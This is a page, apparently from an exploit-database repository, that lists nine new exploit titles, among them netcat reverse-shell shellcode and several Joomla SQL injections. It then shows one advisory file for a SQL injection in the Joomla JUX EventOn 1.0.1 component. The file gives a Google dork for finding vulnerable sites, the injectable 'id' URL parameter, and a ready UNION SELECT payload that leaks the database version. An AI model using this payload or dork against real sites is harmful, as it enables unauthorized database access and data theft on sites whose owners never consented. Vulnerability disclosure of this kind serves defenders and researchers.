
9 new exploits Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes) Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes) Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes) Joomla! Component com_jumi - (fileid) Blind SQL Injection Joomla! Component Jumi - 'fileid' Parameter Blind SQL Injection EPSON TMNet WebConfig 1.00 - Cross-Site Scripting Joomla! Component JUX EventOn 1.0.1 - 'id' Parameter SQL Injection Joomla! Component Monthly Archive 3.6.4 - 'author_form' Parameter SQL Injection Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection Joomla! Component Content ConstructionKit 1.1 - SQL Injection Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection
18 lines
697 B
Text
Executable file
18 lines
697 B
Text
Executable file
# # # # #
|
|
# Exploit Title: Joomla! Component JUX EventOn v1.0.1 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_jux_eventon
|
|
# Date: 04.03.2017
|
|
# Vendor Homepage: http://joomlaux.com/
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/jux-eventon/
|
|
# Demo: http://demo.joomlaux.com/extensions/eventon/
|
|
# Version: 1.0.1
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?option=com_jux_eventon&view=event&id=[SQL]
|
|
# 3+union+select+1,@@version,3,4,5,6
|
|
# # # # #
|